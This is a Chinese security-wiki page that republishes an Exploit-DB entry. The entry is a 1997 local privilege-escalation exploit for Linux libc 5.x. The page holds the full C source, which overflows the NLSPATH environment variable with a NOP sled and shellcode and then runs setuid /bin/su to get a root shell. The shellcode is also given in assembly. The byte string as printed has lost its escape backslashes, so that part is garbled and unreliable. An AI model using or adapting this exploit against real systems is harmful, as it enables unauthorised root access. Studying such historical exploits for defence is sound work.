Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) – libc NLSPATH

Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) – libc NLSPATH

漏洞ID 1053357 漏洞类型
发布时间 1998-01-19 更新时间 1998-01-19
图片[1]-Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) – libc NLSPATH-安全小百科CVE编号 N/A
图片[2]-Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) – libc NLSPATH-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19302
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/379/info


There is a serious vulnerability in linux libc affecting all Linux distributions using libc 5.2.18 and below. The vulnerability is centered around the NLSPATH environment variable. Through exporting the oversized and shell-code including buffer to the environment variable NLSPATH, it is possible to exploit any setuid root program that's based on libc [almost all] and gain root access on the machine.


--- nlspath.c ---

/*
 * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
 * Copyright (c) 1997 by Solar Designer
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
  "x31xc0xb0x31xcdx80x93x31xc0xb0x17xcdx80x68x59x58xffxe1"
  "xffxd4x31xc0x99x89xcfxb0x2ex40xaex75xfdx89x39x89x51x04"
  "x89xfbx40xaex75xfdx88x57xffxb0x0bxcdx80x31xc0x40x31xdb"
  "xcdx80/"
  "/bin/sh"
  "0";

char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 2048
char buffer[bufsize];

main() {
  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 3072;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("NLSPATH", buffer, 1);

  execl("/bin/su", "/bin/su", NULL);
}

--- nlspath.c ---

And the shellcode separately:

--- shellcode.s ---

.text
.globl shellcode
shellcode:
xorl %eax,%eax
movb $0x31,%al
int $0x80
xchgl %eax,%ebx
xorl %eax,%eax
movb $0x17,%al
int $0x80
.byte 0x68
popl %ecx
popl %eax
jmp *%ecx
call *%esp
xorl %eax,%eax
cltd
movl %ecx,%edi
movb $'/'-1,%al
incl %eax
scasb %es:(%edi),%al
jne -3
movl %edi,(%ecx)
movl %edx,4(%ecx)
movl %edi,%ebx
incl %eax
scasb %es:(%edi),%al
jne -3
movb %dl,-1(%edi)
movb $0x0B,%al
int $0x80
xorl %eax,%eax
incl %eax
xorl %ebx,%ebx
int $0x80
.byte '/'
.string "/bin/sh0"

--- shellcode.s ---

相关推荐: KDE文件管理器(kfm)漏洞

KDE文件管理器(kfm)漏洞 漏洞ID 1207542 漏洞类型 未知 发布时间 1997-05-05 更新时间 1997-05-05 CVE编号 CVE-1999-1267 CNNVD-ID CNNVD-199705-005 漏洞平台 N/A CVSS评分…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享